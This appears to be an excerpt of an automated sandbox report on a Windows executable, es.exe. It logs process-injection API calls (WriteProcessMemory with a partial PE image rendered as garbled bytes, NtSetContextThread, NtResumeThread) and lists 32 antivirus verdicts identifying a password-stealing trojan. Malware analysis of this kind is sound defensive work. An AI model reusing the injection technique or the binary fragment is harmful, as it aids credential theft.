WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $«üêïf¹ïf¹ïf¹ôÍ¹©f¹ôø¹ìf¹ôû¹îf¹Richïf¹PEL]âPà Òðð@ð@.textôÐÒ ` base_address: 0x000c0000 process_identifier: 1456 process_handle: 0x000005e8	1	1
WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: base_address: 0x000c1000 process_identifier: 1456 process_handle: 0x000005e8	1	1
WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: base_address: 0x7efde008 process_identifier: 1456 process_handle: 0x000005e8	1	1
NtSetContextThread Sept. 28, 2021, 3:55 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4321424 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000005e4 process_identifier: 1456	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000005e4 suspend_count: 1 process_identifier: 1456	1	0

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

FireEye	Generic.mg.59a50d997d0b4a35
McAfee	RDN/Generic PWS.y
Cylance	Unsafe
Alibaba	TrojanPSW:MSIL/Agensla.019c154d
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Generic.D23EB920
Cyren	W32/MSIL_Kryptik.EHH.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Generik.MUPTVFL
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender	Trojan.GenericKD.37665056
MicroWorld-eScan	Trojan.GenericKD.37665056
Avast	Win32:Malware-gen
Ad-Aware	Trojan.GenericKD.37665056
Sophos	Mal/Generic-S
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Trojan.GenericKD.37665056 (B)
Ikarus	Trojan.SuspectCRC
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	HEUR:Trojan-PSW.MSIL.Agensla.gen
GData	Trojan.GenericKD.37665056
BitDefenderTheta	Gen:NN.ZemsilF.34170.xm0@am74Dlb
ALYac	Trojan.GenericKD.47058292
MAX	malware (ai score=82)
Malwarebytes	Trojan.Downloader.MSIL.Generic
TrendMicro-HouseCall	TROJ_GEN.R002H07IR21
SentinelOne	Static AI - Malicious PE
Fortinet	MSIL/Tiny.BGM!tr.dldr
AVG	Win32:Malware-gen

es.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All